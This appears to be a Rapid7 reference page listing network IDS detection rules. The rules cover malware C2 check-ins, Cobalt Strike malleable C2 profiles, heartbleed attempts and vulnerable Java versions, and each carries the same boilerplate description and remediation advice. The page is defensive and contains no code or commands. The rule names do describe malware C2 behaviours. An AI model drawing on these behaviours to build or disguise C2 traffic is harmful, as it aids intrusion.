ET MALWARE Zbot POST Request to C2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Zbot UA

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Zebrocy Backdoor CnC Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Zebrocy Screenshot Upload

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Zentom FakeAV Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Zeoticus Ransomware CnC Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE ZeroAccess Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ZeroAccess/Max++ Rootkit C&C Activity 1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ZeroAccess P2P Module v6 Reporting

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ZeroLocker Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ZeroLocker Downloading Config

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Zeus Bot Connectivity Check

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Zeus Bot GET to Bing checking Internet connectivity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Zeus Bot GET to Google checking Internet connectivity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Zeus.Downloader Campaign Second Stage Executable Request

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Zeus.Downloader Campaign Second Stage Executable Request 10/4/2014

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Zeus.Downloader Campaign Unknown Initial CnC Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Zeus GameOver Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Zeus POST Request to CnC sk1 and bn1 post parameters

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ZeuS Post to C&C footer.php

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Zeus User-Agent(z00sAgent)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Zhelatin npopup Update Detected

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Zlob Updating via HTTP

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Zlob User Agent (securityinternet)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Zlob User Agent - updating (internetsecurity)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Zlob User Agent - updating (Winlogon)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Zyklon CnC Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET POLICY Autoit Windows Automation tool User-Agent in HTTP Request - Possibly Hostile

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET POLICY Java Client HTTP Request

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET POLICY Vulnerable Java Version 10.0.x Detected

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET POLICY Vulnerable Java Version 11.0.x Detected

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET POLICY Vulnerable Java Version 12.0.x Detected

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET POLICY Vulnerable Java Version 13.0.x Detected

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET POLICY Vulnerable Java Version 14.0.x Detected

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET POLICY Vulnerable Java Version 1.4.x Detected

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET POLICY Vulnerable Java Version 15.0.x Detected

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET POLICY Vulnerable Java Version 1.5.x Detected

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET POLICY Vulnerable Java Version 16.0.x Detected

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET POLICY Vulnerable Java Version 1.6.x Detected

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET POLICY Vulnerable Java Version 17.0.x Detected

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET POLICY Vulnerable Java Version 1.7.x Detected

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET POLICY Vulnerable Java Version 1.8.x Detected

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET POLICY Vulnerable Java Version 9.0.x Detected

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

RAPID7 TEST NTA IDS - rapid7.com/NetworkSensorIDSTest

Description
Copy link

This detection is used to test if the Insight Network Sensor is functioning as intended.

Recommendation
Copy link

This alert can be closed out.

RAPID7-TIDE Cobalt Strike Default SSL Certificate

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

RAPID7-TIDE Cobalt Strike Malleable C2 (Amazon GET)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

RAPID7-TIDE Cobalt Strike Malleable C2 (Amazon POST)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

RAPID7-TIDE Cobalt Strike Malleable C2 (Amazon Server GET Response)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

RAPID7-TIDE Cobalt Strike Malleable C2 (Amazon Server POST Response)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

RAPID7-TIDE Cobalt Strike Malleable C2 (Gmail GET)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

RAPID7-TIDE Cobalt Strike Malleable C2 (Gmail GET Response)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

RAPID7-TIDE Cobalt Strike Malleable C2 (Gmail POST)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

RAPID7-TIDE Cobalt Strike Malleable C2 (Gmail POST Response)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

RAPID7-TIDE Cobalt Strike Malleable C2 (Microsoft Update GET 1)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

RAPID7-TIDE Cobalt Strike Malleable C2 (Microsoft Update GET 2)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

RAPID7-TIDE Cobalt Strike Malleable C2 (Microsoft Update GET Response)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

RAPID7-TIDE Cobalt Strike Malleable C2 (SafeBrowsing GET)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

RAPID7-TIDE Cobalt Strike Malleable C2 (SafeBrowsing POST)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

RAPID7-TIDE Cobalt Strike Malleable C2 (SafeBrowsing Server Response)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

SURICATA TLS invalid encrypted heartbeat encountered, possible exploit attempt (heartbleed)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

SURICATA TLS invalid heartbeat encountered, possible exploit attempt (heartbleed)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

SURICATA TLS overflow heartbeat encountered, possible exploit attempt (heartbleed)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.